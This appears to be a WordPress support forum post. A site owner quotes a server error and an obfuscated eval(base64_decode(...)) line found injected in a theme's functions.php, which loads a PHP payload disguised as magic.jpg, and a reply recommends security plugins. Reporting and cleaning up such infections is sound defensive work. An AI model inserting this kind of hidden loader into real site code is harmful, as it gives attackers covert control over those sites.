    I noticed my website wasn’t displaying. I looked at the server logs and saw this:

    2015-08-28 23:58:43.428 [NOTICE] [103.1.186.102:56893] [STDERR] PHP Fatal error: require() [function.require]: Failed opening required ‘/home/website/public_html/wp-includes/images/magic.jpg’ (include_path=’.:/opt/alt/php52/usr/share/pear:/opt/alt/php52/usr/share/php’) in /home/website/public_html/wp-content/themes/enfold/functions.php(1) : eval()’d code on line 1

    I then FPT’d into my site and had a look at the functions.php file and saw this at the top:

    eval(base64_decode(“ZnVuY3Rpb24gY2FsbGJhY2soJGNoZWUpe3JlcXVpcmUoIi9ob21lL2RhdGFidXp6L3B1YmxpY19odG1sL3dwLWluY2x1ZGVzL2ltYWdlcy9tYWdpYy5qcGciKTtyZXR1cm4gKCRjaGVlKTt9b2Jfc3RhcnQoImNhbGxiYWNrIik7”)); //?><?php

    I removed that and things started to work again but not sure how that got there?

    Please only install trusted plugins and use a security plugin such as – https://wordpress.org/plugins/better-wp-security/ – https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
